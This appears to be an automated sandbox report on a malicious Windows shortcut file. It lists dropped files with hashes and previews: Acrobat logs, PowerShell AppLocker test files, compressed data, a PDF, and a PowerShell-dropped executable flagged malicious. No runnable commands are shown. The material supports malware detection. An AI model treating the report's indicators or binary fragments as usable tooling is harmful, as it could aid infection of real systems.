                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):246
                                                                                    Entropy (8bit):3.512793808211959
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8AYlnNWlMH:Qw946cPbiOxDlbYnuRKO/i6
                                                                                    MD5:C2CE9FCB030C3837A9207235379E136A
                                                                                    SHA1:27FBFAD4398718834F1AE31CD842F54A2EB9A8E4
                                                                                    SHA-256:4E34AF1DAF34188486682C593955C8D1F5B6BD81300A4D63A582A91DA42E039A
                                                                                    SHA-512:057C411AC51D5E44341D8256A68B8762FCBE4B66091F4D1756CE2599A1C3200E806D11F8AEAEA59C28F860118FE807565181D3B123D93330640C8AA4CE470343
                                                                                    Malicious:false
                                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.1.2./.2.0.2.4. . .0.2.:.3.8.:.3.1. .=.=.=.....
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:ASCII text, with very long lines (393)
                                                                                    Category:dropped
                                                                                    Size (bytes):16525
                                                                                    Entropy (8bit):5.361022727805069
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                                                    MD5:70A2D078BEFD5E910EE035832171B399
                                                                                    SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                                                    SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                                                    SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                                                    Malicious:false
                                                                                    Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):15114
                                                                                    Entropy (8bit):5.37454341695554
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:x3jS7Hw2sUjDGtLxJ2JA6pwg70OmtmqddOq/dhd4oyVNYkMuh3v8pCpEhbh/CzjD:44C
                                                                                    MD5:9ABD0B4A6C9E5D0C81D24490C68A699C
                                                                                    SHA1:6DFB4F89F96921BA0874AC05CAC36DB368BAF5A9
                                                                                    SHA-256:47BAF94FDD9BAD4DF28A88CBB415A1C3032CBBB85032B5392C289F532BB815B9
                                                                                    SHA-512:53362FA65DCED55363A6496D7E6053EF85E8F733EE11E077D3D0853D0CF5EAD4EED6AA76DF2B09AD1D03E6B6004A60940C4CA633F497266AF35755C344F89DA1
                                                                                    Malicious:false
                                                                                    Preview:SessionID=5fe649d7-300c-4571-bf82-a5371b99ab8c.1734421106087 Timestamp=2024-12-17T02:38:26:087-0500 ThreadID=2920 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5fe649d7-300c-4571-bf82-a5371b99ab8c.1734421106087 Timestamp=2024-12-17T02:38:26:089-0500 ThreadID=2920 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5fe649d7-300c-4571-bf82-a5371b99ab8c.1734421106087 Timestamp=2024-12-17T02:38:26:089-0500 ThreadID=2920 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5fe649d7-300c-4571-bf82-a5371b99ab8c.1734421106087 Timestamp=2024-12-17T02:38:26:089-0500 ThreadID=2920 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5fe649d7-300c-4571-bf82-a5371b99ab8c.1734421106087 Timestamp=2024-12-17T02:38:26:089-0500 ThreadID=2920 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):29752
                                                                                    Entropy (8bit):5.406364143103211
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3Zmb:EGvIcNYdB09
                                                                                    MD5:153549B070F8A11C2BB85009EB201531
                                                                                    SHA1:2FC124C6526DFDF70A3994B7F29C161048D55249
                                                                                    SHA-256:DF124D6397A8835961CC11A442A65756AEEDD2C374193BD0B48A8A89C073C4DC
                                                                                    SHA-512:46989B9F5F41C1C15C876D0CFA1A3A4273D46792719218DD4E1E178B60BB9B0768DEFC06C361B65752E5EF9DEFA0AD93DEBDE81C049EDC820A085538434B31FA
                                                                                    Malicious:false
                                                                                    Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                    Category:dropped
                                                                                    Size (bytes):386528
                                                                                    Entropy (8bit):7.9736851559892425
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                    Malicious:false
                                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                    Category:dropped
                                                                                    Size (bytes):758601
                                                                                    Entropy (8bit):7.98639316555857
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                    MD5:3A49135134665364308390AC398006F1
                                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                    Malicious:false
                                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
                                                                                    Category:dropped
                                                                                    Size (bytes):1407294
                                                                                    Entropy (8bit):7.97605879016224
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:/xbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07GGZf/wYIGNPzWL07oW:Jb3mlind9i4ufFXpAXkrfUs0CGZHwZGf
                                                                                    MD5:1D97ADFAC1AB78533D7CE6616FC4FAA4
                                                                                    SHA1:E7E4C64BF4BB9F02D37601D5A2A8C25D7B725C09
                                                                                    SHA-256:A2D008C6892A9FDD3EE8228A56CAEADA3B59CFEC59BCF75085609E1F4B001C9D
                                                                                    SHA-512:A91970E6CC5DE82FFB16C0321578D93FCB1802C081C3CA5538B6FB9D27E31D1E433E85606BF42DE33DFC8EA88E1D8652314459427AA03549C065FB7794A7E166
                                                                                    Malicious:false
                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                    Category:dropped
                                                                                    Size (bytes):1419751
                                                                                    Entropy (8bit):7.976496077007677
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:/xTwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG5WLxYGZn3mlind9i4ufFXpAXkru
                                                                                    MD5:DEE0FE98070EB4399C6C08DEE92C8A7C
                                                                                    SHA1:D08807DA97D939DA79375C93501EECC21D1FE6CF
                                                                                    SHA-256:814464759EB985546897367FB0C95C0DF21167DA76399EAE08A87CE664B76575
                                                                                    SHA-512:8D8B910C0C21E2F495EE16ABECC81B968791665EF30A46C6ABA1E0BB40F419D9A25FD75F80D0C0418F4E8D880E0A63BA9529113C6618C90B0CAB55D945D4DDFA
                                                                                    Malicious:false
                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                    Process:C:\Users\user\AppData\Roaming\bdd.exe
                                                                                    File Type:PNG image data, 3344 x 1245, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):2758471
                                                                                    Entropy (8bit):7.997330572040644
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:Q5ChWaN74trH53DSbUHztrNQsiouV7AtNaQF7iFFqadQ2qoEw8gD:JN74tD5zfztrOpnV0tA6a5dQ2qoEwH
                                                                                    MD5:91E46D3B9ED0CE8454ACB6BD900CC61F
                                                                                    SHA1:16C430FCCAFD3A9196C6B49FF6BAAEB0BF0AD2D7
                                                                                    SHA-256:1D7DE4EBB98DDD680A6B6AFD11DAF75C3D97F6499556D0467A55080E2E07B575
                                                                                    SHA-512:96FD07B96B517F8759E50B1F2F440A8E8AD5E243EA5E413C2EE64F9F2D1F2ED7C49C68632FD04863C58326E61089EBAB4C897CFB9A69CF0140D0F42D66AB23D6
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR..............<.H.. .IDATx..;.$....+.U.{..F.]./.l.#..c.k..M..K.r.!m.G6.+W...p..............W\....#"......;>.....Q=./........+A........:.m........h.a.._7.....R.[.s..i..u......G..!..B...G8.3.h...0..G...G..........,......*r).......x)rw)%.,K.....\JkM....g..<.....])..R.e.m.Bp..K1.....]..+....u..8.|].d.....A..X...........=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B...............p...............$h...N...@S...>..A...B..q..w..".a..8[7.A...q..l.|,....X..Zh:..W.X..e.....G..W..e...|...b....B....N.... 0..k.-.z...p..._.......O.....U..%....7.g..M.q...\.K.}..$.Z....7.......=H.T.1>..K%qM&.|p.|....d|.. .R2...K.....b.0.u.. !......8.~-vA.|....{..&^.......}H...0N..`.....N.'M.t{\=$..............o.....@Q..A.$..K5.!...$g..a.-F...K-$;K....ij....`....~...,5|
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PDF document, version 1.3, 4 pages
                                                                                    Category:dropped
                                                                                    Size (bytes):5165
                                                                                    Entropy (8bit):7.497507313253075
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:6IMOdRSgmj0iR8f9pviWtdylFVAsGjwAYgqK+n+SSuX3+G440B22BJoqY9:6IH3SgmVc/Fi/2jTYgqKu+SSuX3PbOF4
                                                                                    MD5:288EB3FB4B84593F8DD6097F0CE7DB5B
                                                                                    SHA1:7828035947333E2D86F489E5E93FBA5ED5143202
                                                                                    SHA-256:9363A089E8823728F2555F2B977CC9F64BAF4F9CFC37C6B2CAE3B047090BA69F
                                                                                    SHA-512:5879B0E1A2B3C101055393ECAEC633111E1D364B02C60BA891602C693B2FA125E1F0F86FA584474370391ABC2B0A3130E47F9842B244CD7CD36C9822B00AC301
                                                                                    Malicious:false
                                                                                    Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 743>>.stream.x..T]O.0.|.W.x...8.M.O.......N..$..).#.)..o..i..u.3.3.v..C..>Nn2...@].8...f....1.q@.....Z.....E.k#X%..$..%..R*H..WFhQ.ceU.7....>.......=d.(.H..$v.dw..$...Y6....0.<>&7.Y..&.-.K...?......t..=.....='.x{|7.M..(y.e. ........3..p........%+80.....`...-.....h...<o.[.,yn..-B ..... .....I..4._...>..u.).^....U.Z......l...G:w@.h...o.>.qD....Z.\....+....a.n....Ot.O...^..Y../.M..4.....8....&..........9..@...g.O=..}2..>.z..._.J6 j#...G....(.....a.....V....?'..|.v...j..B4.G.x.....5...2..QQ.d.By.N...6^.r.,;.7.I.d..Np.t...E......G...+..."N.L.g..<.....iz...7.C..Dr..u).3k. hK.K;.z.V5R.n...O......v.:...~~p.,...=..[.>D..7M.......$G.P: N......x........_..C..{..^`.K..E.^...d(..y.5.iP....6d[..p....Q.c.c....H.lV..........b.endstream.endobj.5 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 6 0 R>>.endobj.6 0 obj.<</Filter /Fla
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):14104424
                                                                                    Entropy (8bit):6.61533286573729
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:8O6PMToeoQULQ7Y7ztrOpnVt6aI2ByvB0:EWoeofsKtrmVt3w0
                                                                                    MD5:1B4971205E6226DF6B9B11527F70A14F
                                                                                    SHA1:0D14FC7CF91AD3FF8B2D803204C1F43DEDC0B577
                                                                                    SHA-256:E47292AE4FF353245DBE74CE199F6B9B2CAE20AD08089BC92A554883175D10F3
                                                                                    SHA-512:FA6325812AC9C5D7D3ECACE3A5E4010AB5E2EB2A14BCAF1AA41FC5461443FE9D1F0534D3DFB869D089396DE1AB0E8AF2BC5F344368F97DEC0167DC7E91265C94
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...r..g..........#.........@H..............@..............................P.......-...............@............... ....................... ..Hh......y6.............h/......................................(....................9..x............................text...<......................... ..`.data....A.......B.................@....bss.........0...........................idata..Hh... ...j..................@....didata..............t..............@....tls.....................................rdata..(...........................@..@.pdata..............................@..@.rsrc....y6.....z6.................@..@...................................@..@................................................................................
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):55
                                                                                    Entropy (8bit):4.306461250274409
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                    Malicious:false
                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Wed Nov 13 07:16:03 2024, mtime=Wed Nov 13 07:16:03 2024, atime=Wed Nov 13 07:16:03 2024, length=454656, window=hidenormalshowminimized
                                                                                    Entropy (8bit):3.4376121456252213
                                                                                    TrID:
                                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                                    File name:ei0woJS3Dy.lnk
                                                                                    File size:2'363 bytes
                                                                                    MD5:00cf9fd36c2868c46213b30cbc0aec64
                                                                                    SHA1:f3f2b029be1279c457e17a262265261d07f46582
                                                                                    SHA256:68b851c1155b8b5b40728d9eba2bb219596a2cd955a1568553d3895e30ace0a0
                                                                                    SHA512:2b0df68184832b479fecac7c846bf59dff9693334e128f047507da88f3c00e53011b7557824bb7c5741a88137642d3323f1e76633c72a06599c169c7b3849773
                                                                                    SSDEEP:48:8j+B3A/7hJKpA8GnaUkF59+dJ9kBwB35W:8yMJfaUSTK+03
                                                                                    TLSH:4841991437F6071DEB735A7198B5E230B27B7C05EEA1DB1E0047418C4932629D566F6B
